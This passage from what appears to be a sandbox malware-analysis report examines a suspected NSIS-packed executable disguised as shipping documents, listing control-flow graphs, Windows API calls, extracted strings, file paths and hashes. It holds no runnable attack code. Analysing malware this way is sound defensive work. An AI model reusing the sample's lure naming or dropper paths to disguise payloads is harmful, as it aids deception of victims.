                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID:
                                        • API String ID: 121052019-0
                                        • Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                        • Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
                                        • Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                        • Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D
                                        Function 00403C29 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 439 403c29-403c41 call 40694b 442 403c43-403c53 call 40649e 439->442 443 403c55-403c8c call 406425 439->443 452 403caf-403cd8 call 403eff call 405f2e 442->452 448 403ca4-403caa lstrcatW 443->448 449 403c8e-403c9f call 406425 443->449 448->452 449->448 457 403d6a-403d72 call 405f2e 452->457 458 403cde-403ce3 452->458 464 403d80-403da5 LoadImageW 457->464 465 403d74-403d7b call 406594 457->465 458->457 459 403ce9-403d11 call 406425 458->459 459->457 466 403d13-403d17 459->466 468 403e26-403e2e call 40140b 464->468 469 403da7-403dd7 RegisterClassW 464->469 465->464 470 403d29-403d35 lstrlenW 466->470 471 403d19-403d26 call 405e53 466->471 482 403e30-403e33 468->482 483 403e38-403e43 call 403eff 468->483 472 403ef5 469->472 473 403ddd-403e21 SystemParametersInfoW CreateWindowExW 469->473 477 403d37-403d45 lstrcmpiW 470->477 478 403d5d-403d65 call 405e26 call 406557 470->478 471->470 476 403ef7-403efe 472->476 473->468 477->478 481 403d47-403d51 GetFileAttributesW 477->481 478->457 485 403d53-403d55 481->485 486 403d57-403d58 call 405e72 481->486 482->476 492 403e49-403e63 ShowWindow call 4068db 483->492 493 403ecc-403ecd call 4056af 483->493 485->478 485->486 486->478 498 403e65-403e6a call 4068db 492->498 499 403e6f-403e81 GetClassInfoW 492->499 497 403ed2-403ed4 493->497 500 403ed6-403edc 497->500 501 403eee-403ef0 call 40140b 497->501 498->499 505 403e83-403e93 GetClassInfoW RegisterClassW 499->505 506 403e99-403ebc DialogBoxParamW call 40140b 499->506 500->482 502 403ee2-403ee9 call 40140b 500->502 501->472 502->482 505->506 510 403ec1-403eca call 403b79 506->510 510->476
                                        APIs
                                          • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                          • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                        • lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,76233420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe",00008001), ref: 00403CAA
                                        • lstrlenW.KERNEL32(Exec,?,?,?,Exec,00000000,C:\Users\user\AppData\Local\acneform,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,76233420), ref: 00403D2A
                                        • lstrcmpiW.KERNEL32(?,.exe,Exec,?,?,?,Exec,00000000,C:\Users\user\AppData\Local\acneform,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
                                        • GetFileAttributesW.KERNEL32(Exec), ref: 00403D48
                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\acneform), ref: 00403D91
                                          • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                        • RegisterClassW.USER32(004336A0), ref: 00403DCE
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
                                        • ShowWindow.USER32(00000005,00000000), ref: 00403E51
                                        • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
                                        • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
                                        • RegisterClassW.USER32(004336A0), ref: 00403E93
                                        • DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\acneform$Control Panel\Desktop\ResourceLocale$Exec$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                        • API String ID: 1975747703-4230011955
                                        • Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                        • Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
                                        • Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                        • Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D
                                        Function 00403082 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 513 403082-4030d0 GetTickCount GetModuleFileNameW call 406047 516 4030d2-4030d7 513->516 517 4030dc-40310a call 406557 call 405e72 call 406557 GetFileSize 513->517 518 4032b2-4032b6 516->518 525 403110 517->525 526 4031f5-403203 call 40301e 517->526 527 403115-40312c 525->527 532 403205-403208 526->532 533 403258-40325d 526->533 529 403130-403139 call 4034d4 527->529 530 40312e 527->530 539 40325f-403267 call 40301e 529->539 540 40313f-403146 529->540 530->529 535 40320a-403222 call 4034ea call 4034d4 532->535 536 40322c-403256 GlobalAlloc call 4034ea call 4032b9 532->536 533->518 535->533 559 403224-40322a 535->559 536->533 564 403269-40327a 536->564 539->533 543 4031c2-4031c6 540->543 544 403148-40315c call 406002 540->544 548 4031d0-4031d6 543->548 549 4031c8-4031cf call 40301e 543->549 544->548 562 40315e-403165 544->562 555 4031e5-4031ed 548->555 556 4031d8-4031e2 call 406a38 548->556 549->548 555->527 563 4031f3 555->563 556->555 559->533 559->536 562->548 568 403167-40316e 562->568 563->526 565 403282-403287 564->565 566 40327c 564->566 569 403288-40328e 565->569 566->565 568->548 570 403170-403177 568->570 569->569 571 403290-4032ab SetFilePointer call 406002 569->571 570->548 572 403179-403180 570->572 575 4032b0 571->575 572->548 574 403182-4031a2 572->574 574->533 576 4031a8-4031ac 574->576 575->518 577 4031b4-4031bc 576->577 578 4031ae-4031b2 576->578 577->548 579 4031be-4031c0 577->579 578->563 578->577 579->548
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00403093
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,00000400), ref: 004030AF
                                          • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,80000000,00000003), ref: 0040604B
                                          • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                        • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,80000000,00000003), ref: 004030FB
                                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                        Strings
                                        • Null, xrefs: 00403179
                                        • Inst, xrefs: 00403167
                                        • "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe", xrefs: 00403088
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
                                        • Error launching installer, xrefs: 004030D2
                                        • C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe, xrefs: 00403099, 004030A8, 004030BC, 004030DC
                                        • soft, xrefs: 00403170
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
                                        • C:\Users\user\Desktop, xrefs: 004030DD, 004030E2, 004030E8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                        • API String ID: 2803837635-286970823
                                        • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                        • Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
                                        • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                        • Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD
                                        Function 00406594 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 204stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 644 406594-40659d 645 4065b0-4065ca 644->645 646 40659f-4065ae 644->646 647 4065d0-4065dc 645->647 648 4067da-4067e0 645->648 646->645 647->648 649 4065e2-4065e9 647->649 650 4067e6-4067f3 648->650 651 4065ee-4065fb 648->651 649->648 653 4067f5-4067fa call 406557 650->653 654 4067ff-406802 650->654 651->650 652 406601-40660a 651->652 655 406610-406653 652->655 656 4067c7 652->656 653->654 660 406659-406665 655->660 661 40676b-40676f 655->661 658 4067d5-4067d8 656->658 659 4067c9-4067d3 656->659 658->648 659->648 662 406667 660->662 663 40666f-406671 660->663 664 406771-406778 661->664 665 4067a3-4067a7 661->665 662->663 668 406673-406691 call 406425 663->668 669 4066ab-4066ae 663->669 666 406788-406794 call 406557 664->666 667 40677a-406786 call 40649e 664->667 670 4067b7-4067c5 lstrlenW 665->670 671 4067a9-4067b2 call 406594 665->671 683 406799-40679f 666->683 667->683 682 406696-406699 668->682 676 4066b0-4066bc GetSystemDirectoryW 669->676 677 4066c1-4066c4 669->677 670->648 671->670 678 40674e-406751 676->678 679 4066d6-4066da 677->679 680 4066c6-4066d2 GetWindowsDirectoryW 677->680 684 406763-406769 call 406805 678->684 685 406753-406756 678->685 679->678 686 4066dc-4066fa 679->686 680->679 682->685 687 40669f-4066a6 call 406594 682->687 683->670 688 4067a1 683->688 684->670 685->684 689 406758-40675e lstrcatW 685->689 691 4066fc-406702 686->691 692 40670e-406726 call 40694b 686->692 687->678 688->684 689->684 697 40670a-40670c 691->697 701 406728-40673b SHGetPathFromIDListW CoTaskMemFree 692->701 702 40673d-406746 692->702 697->692 699 406748-40674c 697->699 699->678 701->699 701->702 702->686 702->699
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(Exec,00000400), ref: 004066B6
                                        • GetWindowsDirectoryW.KERNEL32(Exec,00000400,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,?,?,00000000,00000000,00424620,762323A0), ref: 004066CC
                                        • SHGetPathFromIDListW.SHELL32(00000000,Exec), ref: 0040672A
                                        • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
                                        • lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,?,?,00000000,00000000,00424620,762323A0), ref: 0040675E
                                        • lstrlenW.KERNEL32(Exec,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,?,?,00000000,00000000,00424620,762323A0), ref: 004067B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                        • String ID: Exec$Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 4024019347-1458689035
                                        • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                        • Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
                                        • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                        • Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E
                                        Function 004032B9 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 166COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 703 4032b9-4032d0 704 4032d2 703->704 705 4032d9-4032e2 703->705 704->705 706 4032e4 705->706 707 4032eb-4032f0 705->707 706->707 708 403300-40330d call 4034d4 707->708 709 4032f2-4032fb call 4034ea 707->709 713 4034c2 708->713 714 403313-403317 708->714 709->708 715 4034c4-4034c5 713->715 716 40346d-40346f 714->716 717 40331d-403366 GetTickCount 714->717 720 4034cd-4034d1 715->720 718 403471-403474 716->718 719 4034af-4034b2 716->719 721 4034ca 717->721 722 40336c-403374 717->722 718->721 725 403476 718->725 723 4034b4 719->723 724 4034b7-4034c0 call 4034d4 719->724 721->720 726 403376 722->726 727 403379-403387 call 4034d4 722->727 723->724 724->713 737 4034c7 724->737 730 403479-40347f 725->730 726->727 727->713 736 40338d-403396 727->736 733 403481 730->733 734 403483-403491 call 4034d4 730->734 733->734 734->713 740 403493-40349f call 4060f9 734->740 739 40339c-4033bc call 406aa6 736->739 737->721 745 4033c2-4033d5 GetTickCount 739->745 746 403465-403467 739->746 747 4034a1-4034ab 740->747 748 403469-40346b 740->748 749 403420-403422 745->749 750 4033d7-4033df 745->750 746->715 747->730 751 4034ad 747->751 748->715 754 403424-403428 749->754 755 403459-40345d 749->755 752 4033e1-4033e5 750->752 753 4033e7-403418 MulDiv wsprintfW call 4055dc 750->753 751->721 752->749 752->753 762 40341d 753->762 758 40342a-403431 call 4060f9 754->758 759 40343f-40344a 754->759 755->722 756 403463 755->756 756->721 763 403436-403438 758->763 761 40344d-403451 759->761 761->739 764 403457 761->764 762->749 763->748 765 40343a-40343d 763->765 764->721 765->761
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CountTick$wsprintf
                                        • String ID: *B$ FB$ A$ A$... %d%%
                                        • API String ID: 551687249-3833040932
                                        • Opcode ID: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
                                        • Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
                                        • Opcode Fuzzy Hash: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
                                        • Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99
                                        Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 766 401774-401799 call 402dab call 405e9d 771 4017a3-4017b5 call 406557 call 405e26 lstrcatW 766->771 772 40179b-4017a1 call 406557 766->772 778 4017ba-4017bb call 406805 771->778 772->778 781 4017c0-4017c4 778->781 782 4017c6-4017d0 call 4068b4 781->782 783 4017f7-4017fa 781->783 790 4017e2-4017f4 782->790 791 4017d2-4017e0 CompareFileTime 782->791 785 401802-40181e call 406047 783->785 786 4017fc-4017fd call 406022 783->786 793 401820-401823 785->793 794 401892-4018bb call 4055dc call 4032b9 785->794 786->785 790->783 791->790 795 401874-40187e call 4055dc 793->795 796 401825-401863 call 406557 * 2 call 406594 call 406557 call 405bb7 793->796 808 4018c3-4018cf SetFileTime 794->808 809 4018bd-4018c1 794->809 806 401887-40188d 795->806 796->781 829 401869-40186a 796->829 810 402c38 806->810 812 4018d5-4018e0 CloseHandle 808->812 809->808 809->812 816 402c3a-402c3e 810->816 814 4018e6-4018e9 812->814 815 402c2f-402c32 812->815 818 4018eb-4018fc call 406594 lstrcatW 814->818 819 4018fe-401901 call 406594 814->819 815->810 823 401906-4023a7 call 405bb7 818->823 819->823 823->815 823->816 829->806 831 40186c-40186d 829->831 831->795
                                        APIs
                                        • lstrcatW.KERNEL32(00000000,00000000,Exec,C:\Users\user\AppData\Local\acneform\Baroco,?,?,00000031), ref: 004017B5
                                        • CompareFileTime.KERNEL32(-00000014,?,Exec,Exec,00000000,00000000,Exec,C:\Users\user\AppData\Local\acneform\Baroco,?,?,00000031), ref: 004017DA
                                          • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                          • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                          • Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0), ref: 00405637
                                          • Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll), ref: 00405649
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                          • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsi1309.tmp$C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll$C:\Users\user\AppData\Local\acneform\Baroco$Exec
                                        • API String ID: 1941528284-4042721782
                                        • Opcode ID: 6570eeae84e5bb265c2249ceb719c511b69c24445da543620ab3fdc205d1b951
                                        • Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
                                        • Opcode Fuzzy Hash: 6570eeae84e5bb265c2249ceb719c511b69c24445da543620ab3fdc205d1b951
                                        • Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D
                                        Function 004055DC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 832 4055dc-4055f1 833 4055f7-405608 832->833 834 4056a8-4056ac 832->834 835 405613-40561f lstrlenW 833->835 836 40560a-40560e call 406594 833->836 838 405621-405631 lstrlenW 835->838 839 40563c-405640 835->839 836->835 838->834 842 405633-405637 lstrcatW 838->842 840 405642-405649 SetWindowTextW 839->840 841 40564f-405653 839->841 840->841 843 405655-405697 SendMessageW * 3 841->843 844 405699-40569b 841->844 842->839 843->844 844->834 845 40569d-4056a0 844->845 845->834
                                        APIs
                                        • lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                        • lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                        • lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,00000000,00424620,762323A0), ref: 00405637
                                        • SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll), ref: 00405649
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
